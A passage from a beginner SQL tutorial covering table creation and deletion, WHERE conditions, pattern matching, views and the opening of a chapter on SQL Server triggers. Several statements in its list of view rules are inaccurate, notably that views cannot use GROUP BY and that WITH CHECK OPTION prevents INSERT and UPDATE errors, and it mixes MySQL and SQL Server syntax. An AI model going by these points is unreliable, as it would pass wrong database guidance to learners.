Now, let's see how you can drop a database using SQL Server's graphical user interface. Right-click on the name of the database you want to delete (make sure you have created a test database for this exercise). After you right-click, you will see the Delete option; click on it. A new window will open; make sure you check the box labeled "Close existing connections" at the bottom of the window. Closing existing connections allows you to delete your database safely. With queries, this happens automatically, but when you delete a database through the GUI, you need to select this option so that, if some project is using the database, its connection is closed before the drop goes ahead.

That's all you need to know about databases at this point in your learning curve.
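The queries above target SQL Server, but the lifecycle can be tried from any SQL environment. As a rough sketch only, here is the same create/drop cycle using SQLite through Python's sqlite3 module. Note that SQLite has no CREATE DATABASE or DROP DATABASE statement, because each SQLite database is simply a file, so creating and deleting the file plays those roles here.

```python
import os
import sqlite3

# Connecting to a path that doesn't exist yet creates the database file
# (SQLite's analogue of CREATE DATABASE Employee).
conn = sqlite3.connect("employee_demo.db")
conn.execute("CREATE TABLE placeholder (id INTEGER)")  # force a write to disk
conn.commit()
conn.close()
db_exists = os.path.exists("employee_demo.db")
print(db_exists)  # True

# The analogue of DROP DATABASE is removing the file.
os.remove("employee_demo.db")
print(os.path.exists("employee_demo.db"))  # False
```

The file name `employee_demo.db` is arbitrary; any path works, since in SQLite the file is the database.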

Chapter 8 Tables

Tables are data structures that hold data. In SQL, tables are often referred to as relations, because relationships like one-to-one, one-to-many, and many-to-many exist between tables. I will explain these relationships and what they mean later in this book, so for now let's focus on tables themselves. In this chapter, I will show you how to create, alter, and delete/drop a table, and give you a first look at selecting data from a single table. We will cover complex select queries later in the book, so don't worry.

Let's start with creating a table. In order to create a table, you must have a database to hold your tables and their data. I have set up an Employee database in my SQL Server; go ahead and create an Employee database of your own. Assuming you have successfully created the database, write the following query in the new query text editor:

Example:
Use Employee;
CREATE TABLE Employee (
    StafID      INT         NOT NULL,
    StafName    VARCHAR(20) NOT NULL,
    StafAGE     INT         NOT NULL,
    StafADDRESS CHAR(25),
    StafSALARY  DECIMAL(18, 2),
    PRIMARY KEY (StafID)
);

Output:
Command(s) completed successfully.

The example above contains an SQL query that uses the Employee database and creates a table inside it. The name of that table is Employee, as you can see in the second line of the query. StafID, StafName, StafAGE, StafADDRESS and StafSALARY are

columns/attributes of this table. Right next to each column name, its datatype is given. The NOT NULL specifier tells SQL Server that the column can't hold NULL values, which means you have to supply a value for the non-nullable columns when you insert data into this table.

PRIMARY KEY (StafID)

The line above says the StafID column will be used as the primary key column. Primary keys have certain properties: the primary key column must hold unique values, and each primary key value identifies an entire tuple, or record, in an SQL table.

Now that we have created a table, let's insert some data into it. I will use the Employee table to add details about different employees. The query to insert data into a table looks like the following example:

Example:
Insert into Employee (StafID,StafName,StafAGE,StafADDRESS,StafSALARY) Values(1,'John','23','America', '5000');
Insert into Employee (StafID,StafName,StafAGE,StafADDRESS,StafSALARY) Values(2,'Mike','32','Africa', '4000');
Insert into Employee (StafID,StafName,StafAGE,StafADDRESS,StafSALARY) Values(3,'Sara','43','America', '6000');
Insert into Employee (StafID,StafName,StafAGE,StafADDRESS,StafSALARY) Values(4,'Aaron','56','America', '15000');
Insert into Employee (StafID,StafName,StafAGE,StafADDRESS,StafSALARY) Values(5,'Talha','24','Pakistan', '10000');

Output:
(1 row(s) affected)

(1 row(s) affected)
(1 row(s) affected)
(1 row(s) affected)
(1 row(s) affected)

So far, we have created a database and added a table to it, and in the example above I inserted data into the Employee table. The output of the query only shows whether the query was successful and, if so, how many rows it affected, as you can see above. Now, let's see how you can view the data present in a table. To see the contents of an SQL table, we can use the SQL SELECT statement.

Example:
/****** Script for SelectTopNRows command from SSMS ******/
SELECT TOP 1000 [StafID]
    ,[StafName]
    ,[StafAGE]
    ,[StafADDRESS]
    ,[StafSALARY]
FROM [Employee].[dbo].[Employee];

The query above selects the top 1000 rows of the Employee table. You can select all records by removing TOP 1000. If you don't want to list the column names in the query, you can simply put an asterisk after the SELECT keyword:

/****** Script for SelectTopNRows command from SSMS ******/
SELECT * FROM [Employee].[dbo].[Employee];

The output of both queries will be the following:

Output:
StafID  StafName  StafAGE  StafADDRESS  StafSALARY
1       John      23       America      5000.00
2       Mike      32       Africa       4000.00
3       Sara      43       America      6000.00
4       Aaron     56       America      15000.00
5       Talha     24       Pakistan     10000.00

You can empty an SQL table using the TRUNCATE command. Truncate deletes all the data inside a table, but it doesn't delete or modify the structure of the table; after a successful truncate operation, you are left with an empty table. To truncate the Employee table, use the following query:

Example:
Truncate Table Employee;

Output:
Command(s) completed successfully.

Now, if you select the records of the Employee table, you will find that it's empty and the records you inserted earlier are gone. If you want to drop the table along with its data, use the DROP command.

Example:
Drop Table Employee;

Output:
Command(s) completed successfully.

After the successful execution of the drop command, the Employee table is deleted.

Three relationship types exist between tables. A one-to-one relationship between two tables means that a single record from table A is associated with only a single row in table B. A one-to-many relationship means that a single record from table A can be related to more than one record in table B; for example, a single employee, Aaron, could serve more than one customer, so a one-to-many relationship exists between employees and customers. In a many-to-many relationship, multiple rows from table A can be associated with multiple rows of table B; for example, a course can have many registered students, and a student can register for more than one course. The list of examples goes on and on; it will be a good exercise for you to come up with at least five examples of each relationship type.
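If you want to experiment with this chapter's whole workflow (create, insert, select, empty, drop) outside SQL Server, the sketch below runs it against an in-memory SQLite database through Python's sqlite3 module. SQLite has no TRUNCATE TABLE, so an unfiltered DELETE stands in for it; the table shape mirrors the chapter's Employee table.

```python
import sqlite3

conn = sqlite3.connect(":memory:")  # throwaway database
cur = conn.cursor()

# Same shape as the chapter's Employee table (SQLite accepts these type
# names but stores values under its own looser affinity rules).
cur.execute("""
    CREATE TABLE Employee (
        StafID      INT         NOT NULL PRIMARY KEY,
        StafName    VARCHAR(20) NOT NULL,
        StafAGE     INT         NOT NULL,
        StafADDRESS CHAR(25),
        StafSALARY  DECIMAL(18, 2)
    )
""")
cur.executemany(
    "INSERT INTO Employee VALUES (?, ?, ?, ?, ?)",
    [(1, 'John', 23, 'America', 5000),
     (2, 'Mike', 32, 'Africa', 4000),
     (3, 'Sara', 43, 'America', 6000)],
)

cur.execute("SELECT StafName FROM Employee ORDER BY StafID")
names = [row[0] for row in cur.fetchall()]
print(names)  # ['John', 'Mike', 'Sara']

# SQLite has no TRUNCATE; an unfiltered DELETE empties the table instead.
cur.execute("DELETE FROM Employee")
cur.execute("SELECT COUNT(*) FROM Employee")
remaining = cur.fetchone()[0]
print(remaining)  # 0

cur.execute("DROP TABLE Employee")
conn.close()
```

The structure survives the DELETE, which is exactly the behavior the chapter attributes to TRUNCATE; only the DROP at the end removes the table itself.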

Chapter 9 Defining Your Condition

There is no doubt that a data server can handle many complications, provided everything is defined clearly. Conditions are defined with the help of expressions, which may consist of numbers, strings, built-in functions, subqueries, and so on. Furthermore, conditions are always built with operators, which may be comparison operators (=, !=, <, >, <>, LIKE, IN, BETWEEN, etc.) or arithmetic operators (+, -, *, /). All these things are used together to form a condition. Now let's move on to condition types.

Types of Conditions

We can use conditions to remove unwanted data from our search. Let's have a look at some of these condition types.

Equality Condition

Conditions that use the equal sign '=' to equate one expression to another are referred to as equality conditions. You have used this condition many times by now. If we want to know the name of the HOD for the Genetic Engineering department, we would do the following:

(1) First go to the ENGINEERING_STUDENTS table and find the ENGG_ID for the ENGG_NAME 'Genetic':

SELECT ENGG_ID FROM ENGINEERING_STUDENTS WHERE ENGG_NAME ='Genetic';

+---------+
| ENGG_ID |
+---------+
|       3 |
+---------+

(2) Then go to the DEPT_DATA table and find the value in the HOD column for ENGG_ID = 3.

SELECT HOD FROM DEPT_DATA where ENGG_ID='3';

+--------------+
| HOD          |
+--------------+
| Victoria Fox |
+--------------+

In the first step, we equated the value of the column ENGG_NAME to the string value 'Genetic'. We can also get all the information in one result set by using an INNER JOIN and applying the equality condition twice:

SELECT e.ENGG_NAME, e.STUDENT_STRENGTH, d.HOD, d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e
INNER JOIN DEPT_DATA d ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME = 'Genetic';

+-----------+------------------+--------------+------------+
| ENGG_NAME | STUDENT_STRENGTH | HOD          | NO_OF_Prof |
+-----------+------------------+--------------+------------+
| Genetic   |               75 | Victoria Fox |          7 |
+-----------+------------------+--------------+------------+

Inequality Condition

The inequality condition is the opposite of the equality condition and is expressed by the '!=' and '<>' symbols.

SELECT e.ENGG_NAME, e.STUDENT_STRENGTH, d.HOD, d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e
INNER JOIN DEPT_DATA d ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME <> 'Genetic';

+-------------------+------------------+------------------+------------+
| ENGG_NAME         | STUDENT_STRENGTH | HOD              | NO_OF_Prof |
+-------------------+------------------+------------------+------------+
| Electronics       |              150 | Miley Andrews    |          7 |
| Software          |              250 | Alex Dawson      |          6 |
| Mechanical        |              150 | Anne Joseph      |          5 |
| Biomedical        |               72 | Sophia Williams  |          8 |
| Instrumentation   |               80 | Olive Brown      |          4 |
| Chemical          |               75 | Joshua Taylor    |          6 |
| Civil             |               60 | Ethan Thomas     |          5 |
| Electronics & Com |              250 | Michael Anderson |          8 |
| Electrical        |               60 | Martin Jones     |          5 |
+-------------------+------------------+------------------+------------+

The statement is the same as saying:

SELECT e.ENGG_NAME, e.STUDENT_STRENGTH, d.HOD, d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e
INNER JOIN DEPT_DATA d ON e.ENGG_ID = d.ENGG_ID

WHERE e.ENGG_NAME != 'Genetic';

If you execute the above statement in the command window, you will receive the same result set.

Using the equality condition to modify data

Suppose the institute decides to close the Genetic department; in that case, it is important to delete its records from the database as well. First, find out the ENGG_ID for 'Genetic':

SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME='Genetic';

+---------+-----------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-----------+------------------+
|       3 | Genetic   |               75 |
+---------+-----------+------------------+

Now, from DEPT_DATA, we will DELETE the row having ENGG_ID = '3':

DELETE FROM DEPT_DATA WHERE ENGG_ID ='3';

Next, we check whether the data has actually been deleted:

SELECT * FROM DEPT_DATA;

+---------+------------------+------------+---------+
| Dept_ID | HOD              | NO_OF_Prof | ENGG_ID |
+---------+------------------+------------+---------+
|     100 | Miley Andrews    |          7 |       1 |
|     101 | Alex Dawson      |          6 |       2 |
|     103 | Anne Joseph      |          5 |       4 |
|     104 | Sophia Williams  |          8 |       5 |
|     105 | Olive Brown      |          4 |       6 |
|     106 | Joshua Taylor    |          6 |       7 |
|     107 | Ethan Thomas     |          5 |       8 |
|     108 | Michael Anderson |          8 |       9 |
|     109 | Martin Jones     |          5 |      10 |

+---------+------------------+------------+---------+

Then delete the row from ENGINEERING_STUDENTS where the ENGG_ID is 3:

DELETE FROM ENGINEERING_STUDENTS WHERE ENGG_ID='3';

Lastly, check whether the row has been deleted from ENGINEERING_STUDENTS:

SELECT * FROM ENGINEERING_STUDENTS;

+---------+-------------------+------------------+
| ENGG_ID | ENGG_NAME         | STUDENT_STRENGTH |
+---------+-------------------+------------------+
|       1 | Electronics       |              150 |
|       2 | Software          |              250 |
|       4 | Mechanical        |              150 |
|       5 | Biomedical        |               72 |
|       6 | Instrumentation   |               80 |
|       7 | Chemical          |               75 |
|       8 | Civil             |               60 |
|       9 | Electronics & Com |              250 |

|      10 | Electrical        |               60 |
+---------+-------------------+------------------+

Note that the records have been successfully deleted from both places. In the same way, the equality condition can be used to update data.

Conditions used to define range

We have seen examples of ranges previously, but we will delve a little deeper to solidify that knowledge. We want to write queries that define a range, to ensure an expression falls within the desired bounds.

SELECT * FROM ENGINEERING_STUDENTS WHERE STUDENT_STRENGTH>175;

+---------+-------------------+------------------+
| ENGG_ID | ENGG_NAME         | STUDENT_STRENGTH |
+---------+-------------------+------------------+
|       2 | Software          |              250 |
|       9 | Electronics & Com |              250 |

+---------+-------------------+------------------+

Have a look at another simple example:

SELECT * FROM ENGINEERING_STUDENTS WHERE 300>STUDENT_STRENGTH AND STUDENT_STRENGTH>78;

+---------+-------------------+------------------+
| ENGG_ID | ENGG_NAME         | STUDENT_STRENGTH |
+---------+-------------------+------------------+
|       1 | Electronics       |              150 |
|       2 | Software          |              250 |
|       4 | Mechanical        |              150 |
|       6 | Instrumentation   |               80 |
|       9 | Electronics & Com |              250 |

+---------+-------------------+------------------+

Next, we will write the same query using the BETWEEN operator. When defining a range with BETWEEN, specify the lesser value first and the greater value second.

SELECT * FROM ENGINEERING_STUDENTS WHERE STUDENT_STRENGTH BETWEEN 78 AND 300;

+---------+-------------------+------------------+
| ENGG_ID | ENGG_NAME         | STUDENT_STRENGTH |
+---------+-------------------+------------------+
|       1 | Electronics       |              150 |
|       2 | Software          |              250 |
|       4 | Mechanical        |              150 |
|       6 | Instrumentation   |               80 |
|       9 | Electronics & Com |              250 |

+---------+-------------------+------------------+

Membership Conditions

Sometimes the requirement is not to look for values in a range, but in a set of specific values. To give you a better idea, suppose that you need to find the details for 'Electronics', 'Instrumentation' and 'Mechanical':

SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME = 'Electronics' OR ENGG_NAME = 'Mechanical' OR ENGG_NAME = 'Instrumentation';

+---------+-----------------+------------------+
| ENGG_ID | ENGG_NAME       | STUDENT_STRENGTH |
+---------+-----------------+------------------+
|       1 | Electronics     |              150 |
|       4 | Mechanical      |              150 |
|       6 | Instrumentation |               80 |

+---------+-----------------+------------------+

We can simplify the above query and get the same result set using the IN operator:

SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME IN ('Electronics', 'Instrumentation', 'Mechanical');

+---------+-----------------+------------------+
| ENGG_ID | ENGG_NAME       | STUDENT_STRENGTH |
+---------+-----------------+------------------+
|       1 | Electronics     |              150 |
|       4 | Mechanical      |              150 |
|       6 | Instrumentation |               80 |

+---------+-----------------+------------------+

In the same way, if you want to find the data for engineering fields other than 'Electronics', 'Mechanical' and 'Instrumentation', use the NOT IN operator as shown below:

SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME NOT IN ('Electronics', 'Instrumentation', 'Mechanical');

+---------+-------------------+------------------+
| ENGG_ID | ENGG_NAME         | STUDENT_STRENGTH |
+---------+-------------------+------------------+
|       2 | Software          |              250 |
|       5 | Biomedical        |               72 |
|       7 | Chemical          |               75 |
|       8 | Civil             |               60 |
|       9 | Electronics & Com |              250 |

|      10 | Electrical        |               60 |
+---------+-------------------+------------------+

Matching Conditions

Suppose you meet all the HODs of the college at a meeting and you are very impressed by one of them, but you only remember that the name starts with 'S'. You can use the following query to find the right person:

SELECT * FROM DEPT_DATA WHERE LEFT(HOD,1)='S';

Here we are using the function LEFT(). It takes two parameters: the first is a string, in this case the column HOD, from which the result is extracted; the second determines how many characters should be extracted from the left. Since we remember that the name starts with 'S', we extract the first letter of each name in the HOD column and check whether it matches 'S'. The result is shown below:

+---------+-----------------+------------+---------+
| Dept_ID | HOD             | NO_OF_Prof | ENGG_ID |
+---------+-----------------+------------+---------+
|     104 | Sophia Williams |          8 |       5 |
+---------+-----------------+------------+---------+
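LEFT() is available in MySQL and SQL Server but not everywhere; in SQLite, for instance, substr(column, 1, n) extracts the same prefix. The sketch below replays the prefix search on a small made-up slice of the DEPT_DATA table, using Python's sqlite3 module.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute(
    "CREATE TABLE DEPT_DATA (Dept_ID INT, HOD TEXT, NO_OF_Prof INT, ENGG_ID INT)"
)
# A made-up subset of the chapter's DEPT_DATA rows.
cur.executemany(
    "INSERT INTO DEPT_DATA VALUES (?, ?, ?, ?)",
    [(100, 'Miley Andrews', 7, 1),
     (104, 'Sophia Williams', 8, 5),
     (108, 'Michael Anderson', 8, 9)],
)

# substr(HOD, 1, 1) is SQLite's stand-in for LEFT(HOD, 1).
cur.execute("SELECT HOD FROM DEPT_DATA WHERE substr(HOD, 1, 1) = 'S'")
s_names = [row[0] for row in cur.fetchall()]
print(s_names)  # ['Sophia Williams']

# Extract two characters to match names starting with 'Mi'.
cur.execute("SELECT HOD FROM DEPT_DATA WHERE substr(HOD, 1, 2) = 'Mi'")
mi_names = [row[0] for row in cur.fetchall()]
print(mi_names)  # ['Miley Andrews', 'Michael Anderson']
conn.close()
```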

One more demonstration to help reinforce the concept. Suppose you want to look for people whose names start with 'Mi':

SELECT * FROM DEPT_DATA WHERE LEFT(HOD,2)='Mi';

+---------+------------------+------------+---------+
| Dept_ID | HOD              | NO_OF_Prof | ENGG_ID |
+---------+------------------+------------+---------+
|     100 | Miley Andrews    |          7 |       1 |
|     108 | Michael Anderson |          8 |       9 |

+---------+------------------+------------+---------+

Pattern Matching

Pattern matching is another interesting feature you will enjoy and use often as a developer. The concept is simple: an underscore ( _ ) matches any single character, and a percent sign (%) matches zero, one, or more characters. Before moving ahead, know that two comparison operators, LIKE and NOT LIKE, are used in pattern matching. Now on to the exercises. Here is the same example where we want to find the HOD whose name starts with 'S':

SELECT * FROM DEPT_DATA WHERE HOD LIKE 'S%';

+---------+-----------------+------------+---------+
| Dept_ID | HOD             | NO_OF_Prof | ENGG_ID |
+---------+-----------------+------------+---------+
|     104 | Sophia Williams |          8 |       5 |
+---------+-----------------+------------+---------+

Now, let's look for the HOD whose name ends with 'ws':

SELECT * FROM DEPT_DATA WHERE HOD LIKE '%ws';

+---------+---------------+------------+---------+
| Dept_ID | HOD           | NO_OF_Prof | ENGG_ID |
+---------+---------------+------------+---------+
|     100 | Miley Andrews |          7 |       1 |

+---------+---------------+------------+---------+

Let's see if we can find a name containing the string 'cha':

SELECT * FROM DEPT_DATA WHERE HOD LIKE '%cha%';

+---------+------------------+------------+---------+
| Dept_ID | HOD              | NO_OF_Prof | ENGG_ID |
+---------+------------------+------------+---------+
|     108 | Michael Anderson |          8 |       9 |

+---------+------------------+------------+---------+

The next example shows how to look for a five-letter word with 'i' as the second letter:

SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME LIKE '_i___';

+---------+-----------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-----------+------------------+
|       8 | Civil     |               60 |

+---------+-----------+------------------+

Regular Expressions

To add more flexibility to your search operations, you can make use of regular expressions. This is a vast topic, so here are just a few tips to make you comfortable when utilizing regular expressions:

'^' indicates the beginning of a string.
'$' indicates the end of a string.
'.' denotes any single character.
[...] matches any character listed between the square brackets.
[^...] matches any character not contained in the square brackets' list.
p1|p2|p3 matches any of the given patterns p1, p2, or p3.
* denotes zero or more occurrences of the preceding element.
+ indicates one or more occurrences of the preceding element.
{n} indicates exactly n instances of the preceding element.
{m,n} indicates m through n instances of the preceding element.

Here are a few examples of regular expressions. Find all HODs whose names start with 'M':

SELECT * FROM DEPT_DATA WHERE HOD REGEXP '^M';

+---------+------------------+------------+---------+
| Dept_ID | HOD              | NO_OF_Prof | ENGG_ID |
+---------+------------------+------------+---------+
|     100 | Miley Andrews    |          7 |       1 |
|     108 | Michael Anderson |          8 |       9 |
|     109 | Martin Jones     |          5 |      10 |

+---------+------------------+------------+---------+

Look for HOD names that end with 'ws':

SELECT * FROM DEPT_DATA WHERE HOD REGEXP 'ws$';

+---------+---------------+------------+---------+
| Dept_ID | HOD           | NO_OF_Prof | ENGG_ID |
+---------+---------------+------------+---------+
|     100 | Miley Andrews |          7 |       1 |
+---------+---------------+------------+---------+

NULL

Before we end this chapter, here is something you must know about NULL. NULL is defined as the absence of a value. An expression can be NULL, but it cannot be equal to NULL; likewise, two NULLs are never equal to each other. Whenever you have to test an expression for NULL, don't write WHERE COLUMN_NAME = NULL. The proper method is to write COLUMN_NAME IS NULL.
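The = NULL pitfall is easy to demonstrate. This sketch, using SQLite through Python's sqlite3 module with a tiny made-up table, shows that an equality comparison against NULL matches nothing, while IS NULL finds the missing value:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE Staff (Name TEXT, City TEXT)")
cur.executemany("INSERT INTO Staff VALUES (?, ?)",
                [('Ann', 'Ottawa'), ('Tom', None)])

# Wrong: NULL = NULL evaluates to unknown, so no row can ever match.
cur.execute("SELECT Name FROM Staff WHERE City = NULL")
wrong_way = cur.fetchall()
print(wrong_way)  # []

# Right: IS NULL is the proper test for the absence of a value.
cur.execute("SELECT Name FROM Staff WHERE City IS NULL")
right_way = cur.fetchall()
print(right_way)  # [('Tom',)]
conn.close()
```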

Chapter 10 Views

VIEWS are virtual tables: stored SQL queries in the database, each with a predefined query and a unique name. They are the tables that result from your SQL queries. As a beginner, you will want to learn how to use VIEWS. Among their numerous uses is their flexibility in combining rows and columns from multiple tables. Here are important pointers on, and advantages of, using VIEWS:

1. You can summarize data from different tables, or a subset of columns from various tables.
2. You can control what users of your databases can see, and restrict what you don't want them to view.
3. You can organize your database for your users' easy manipulation, while simultaneously protecting your non-public files.
4. You can modify, edit, or UPDATE your data. There are sometimes limitations, though, such as being able to access only one column when using a VIEW.
5. You can create columns from various tables for your reports.
6. You can increase the security of your databases, because VIEWS can display only the information that you want displayed, protecting specific information from other users.
7. You can provide users with easy and efficient access paths to your data.
8. You can allow users of your databases to derive various tables from your data without dealing with the complexity of your databases.
9. You can rename columns through views. If you are a website owner, VIEWS can also provide domain support.
10. The WHERE clause in a SQL VIEW query may not contain subqueries.

11. For the INSERT keyword to function, you must include all NOT NULL columns from the original table.
12. Do not use the WITH ENCRYPTION clause for your VIEWS (unless utterly necessary), because you may not be able to retrieve the SQL afterwards.
13. Avoid creating a VIEW for each base table (original table). This adds to the workload of managing your databases; as long as you create your base SQL query properly, there is no need for a VIEW per base table.
14. VIEWS that use the DISTINCT and ORDER BY clauses or keywords may not produce the expected results.
15. VIEWS can be updated on the condition that the SELECT clause does not contain summary functions, set operators, or set functions.
16. When UPDATING, your base table and your VIEW should stay synchronized. Each time you UPDATE the base table, you must check the VIEW so that the data presented is still correct.
17. Avoid creating unnecessary VIEWS, because this will clutter your catalogue.
18. Specify "column_names" clearly.
19. The FROM clause of a SQL VIEW query may not contain many tables, unless specified.
20. A SQL VIEW query may not contain HAVING or GROUP BY.
21. The SELECT keyword can join your VIEW with your base table.

How to create VIEWS

You can create VIEWS through the following easy steps:

Step #1 - Check if your system is appropriate to implement VIEW queries.
Step #2 - Make use of the CREATE VIEW SQL statement.
Step #3 - Use keywords for your SQL syntax just like with any other SQL

main queries.
Step #4 - Your basic CREATE VIEW statement or syntax will appear like this:

Example:
CREATE VIEW view_"table_name" AS
SELECT "column_name1"
FROM "table_name"
WHERE [condition];

Let's have a specific example based on our original table.

EmployeesSalary
Names               Age   Salary     City
Williams, Michael   22    30000.00   Casper
Colton, Jean        24    37000.00   San Diego
Anderson, Ted       30    45000.00   Laramie
Dixon, Allan        27    43000.00   Chicago
Clarkson, Tim       25    35000.00   New York
Alaina, Ann         32    41000.00   Ottawa
Rogers, David       29    50000.00   San Francisco
Lambert, Jancy      38    47000.00   Los Angeles
Kennedy, Tom        27    34000.00   Denver
Schultz, Diana      40    46000.00   New York

Based on the table above, you may want to create a view of the employees' names and cities only. This is how you should write your statement.

Example:
CREATE VIEW EmployeesSalary_VIEW AS
SELECT Names, City
FROM EmployeesSalary;

From the resulting VIEW, you can now run a query such as the statement below:

SELECT * FROM EmployeesSalary_VIEW;

This SQL query will display a table that appears this way:

EmployeesSalary_VIEW
Names               City
Williams, Michael   Casper
Colton, Jean        San Diego
Anderson, Ted       Laramie
Dixon, Allan        Chicago
Clarkson, Tim       New York
Alaina, Ann         Ottawa
Rogers, David       San Francisco
Lambert, Jancy      Los Angeles
Kennedy, Tom        Denver
Schultz, Diana      New York
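To see the same Names-and-City view work end to end, here is a sketch using SQLite through Python's sqlite3 module, loaded with just the first two rows of the EmployeesSalary table; querying the view returns only the two exposed columns, with Age and Salary hidden.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute(
    "CREATE TABLE EmployeesSalary (Names TEXT, Age INT, Salary REAL, City TEXT)"
)
cur.executemany(
    "INSERT INTO EmployeesSalary VALUES (?, ?, ?, ?)",
    [('Williams, Michael', 22, 30000.00, 'Casper'),
     ('Colton, Jean', 24, 37000.00, 'San Diego')],
)

# The view exposes only Names and City; Age and Salary stay hidden.
cur.execute("""
    CREATE VIEW EmployeesSalary_VIEW AS
    SELECT Names, City FROM EmployeesSalary
""")
cur.execute("SELECT * FROM EmployeesSalary_VIEW")
view_rows = cur.fetchall()
print(view_rows)  # [('Williams, Michael', 'Casper'), ('Colton, Jean', 'San Diego')]

cur.execute("DROP VIEW EmployeesSalary_VIEW")
conn.close()
```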

Using the keyword WITH CHECK OPTION

These keywords ensure that there will be no errors returned by INSERT and UPDATE statements, and that all conditions are fulfilled properly.

Example:
CREATE VIEW "table_name"_VIEW AS
SELECT "column_name1", "column_name2"
FROM "table_name"
WHERE [condition]
WITH CHECK OPTION;

Applying this SQL statement to the same conditions (display name and city), we can now come up with our WITH CHECK OPTION statement.

Example:
CREATE VIEW EmployeesSalary_VIEW AS
SELECT Names, City
FROM EmployeesSalary
WHERE City IS NOT NULL
WITH CHECK OPTION;

The SQL query above will ensure that there will be no NULL returns in your

resulting table.

DROPPING VIEWS

You can drop your VIEWS whenever you don't need them anymore. The SQL syntax is the same as for the main SQL statements.

Example:
DROP VIEW EmployeesSalary_VIEW;

UPDATING VIEWS

You can easily UPDATE VIEWS by following the SQL query for main queries.

Example:
CREATE OR REPLACE VIEW "table_name"_VIEW AS
SELECT "column_name"
FROM "table_name"
WHERE condition;

DELETING VIEWS

The SQL syntax for deleting data through VIEWS works much the same way as deleting data with the main SQL query; the only difference is the name of the table. If you use the VIEW example above and want to delete the rows where the City is 'New York', you can come up with this SQL statement.

Example:
DELETE FROM EmployeesSalary_VIEW WHERE City = 'New York';

The SQL statement above would have this output:

EmployeesSalary
Names               Age   Salary     City
Williams, Michael   22    30000.00   Casper
Colton, Jean        24    37000.00   San Diego
Anderson, Ted       30    45000.00   Laramie
Dixon, Allan        27    43000.00   Chicago
Alaina, Ann         32    41000.00   Ottawa
Rogers, David       29    50000.00   San Francisco
Lambert, Jancy      38    47000.00   Los Angeles
Kennedy, Tom        27    34000.00   Denver

INSERTING ROWS

Creating an SQL statement for INSERTING ROWS is similar to the UPDATING VIEWS syntax. Make sure you have included the NOT NULL columns.

Example:
INSERT INTO "table_name"_VIEW ("column_name1") VALUES (value1);

VIEWS can be utterly useful if you utilize them appropriately.

So far in this book, tables have been used to represent data and information. Views are like virtual tables, but they don't hold any data, and their contents are defined by a query. One of the biggest advantages of a view is that it can be used as a security measure by restricting access to certain columns or rows. Also, you can use views to return a selective amount of data instead of detailed data: a view protects the data layer while allowing access to the necessary data. A view differs from a stored procedure in that it doesn't use parameters to carry out a function.

Encrypting the View

You can create a view without the columns that contain sensitive data, and thus hide data you don't want to share. You can also encrypt the view definition when it returns data of a privileged nature. In that case, you are not only restricting certain columns in a view, you are also restricting who has access to the view definition. However, once you encrypt a view, it is difficult to get back to the original view detail, so the best approach is to make a backup of the original view.

Creating a view

To create a view in SSMS, expand the database you are working on, right-click on Views and select New View. The View Designer will appear, showing all the tables that you can add. Add the tables you want in the view, then select which columns you want. You can change the sort type for each column from ascending to descending and can also give column names aliases. To the right of the sort type there is Filter. A filter restricts what a user can and cannot see: once you set a filter (e.g. sales > 1000), a user cannot retrieve more information than the view allows.
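The filter idea (e.g. sales > 1000) doesn't depend on the View Designer; it can be baked into the view definition directly. Here is a sketch with a hypothetical Orders table, invented for this illustration, in SQLite through Python's sqlite3 module; anyone querying the view simply cannot see the filtered-out rows.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
# Hypothetical table, invented for this illustration.
cur.execute("CREATE TABLE Orders (OrderID INT, Sales REAL)")
cur.executemany("INSERT INTO Orders VALUES (?, ?)",
                [(1, 500.0), (2, 1500.0), (3, 2500.0)])

# The filter lives inside the view definition, so the view can never
# return rows with Sales <= 1000, no matter how it is queried.
cur.execute(
    "CREATE VIEW vw_BigSales AS SELECT * FROM Orders WHERE Sales > 1000"
)
cur.execute("SELECT OrderID FROM vw_BigSales ORDER BY OrderID")
big_ids = [row[0] for row in cur.fetchall()]
print(big_ids)  # [2, 3]
conn.close()
```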

In the T-SQL code there is a line stating TOP (100) PERCENT, which is the default. You can remove it (also removing the ORDER BY statement) or change the value. Once you have made the changes, save the view with the Save button, naming it with the vw_ prefix. You can view the contents of the view if you refresh the database, open Views, right-click on the view and select "Select Top 1000 Rows".

Indexing a view

You can index a view just like you can index a table, and the rules are very similar. When you build an index on a view, the first index needs to be a unique clustered index; subsequent nonclustered indexes can then be created. You need to have the following settings on, and one off:

SET ANSI_NULLS ON
SET ANSI_PADDING ON
SET ANSI_WARNINGS ON
SET CONCAT_NULL_YIELDS_NULL ON
SET ARITHABORT ON
SET QUOTED_IDENTIFIER ON
SET NUMERIC_ROUNDABORT OFF

Now type the following:

CREATE UNIQUE CLUSTERED INDEX _ixCustProduct
ON table.vw_CusProd(col1,col2)

Chapter 11 Triggers

Sometimes a modification to the data in your database needs to cause an automatic action on data somewhere else, be it in your database, another database, or elsewhere within SQL Server. A trigger is an object that will do this. A trigger in SQL Server is essentially a stored procedure that runs in response to an event, performing the action you want to achieve. Triggers are mostly used to ensure business logic is adhered to in the database, to perform cascading data modifications (i.e. a change in one table results in changes in other tables), and to keep track of specific changes to a table.

SQL Server supports three types of triggers:

DDL (Data Definition Language) triggers fire in response to a DDL statement being executed (e.g. CREATE, ALTER or DROP). DDL triggers can be used for auditing or limiting DBA activity.

Logon triggers fire when a session to the instance is established. This type of trigger can be used to stop users from establishing a connection to an instance.

DML (Data Manipulation Language) triggers fire as a result of a DML statement (INSERT, UPDATE, DELETE) being executed.

DDL Triggers

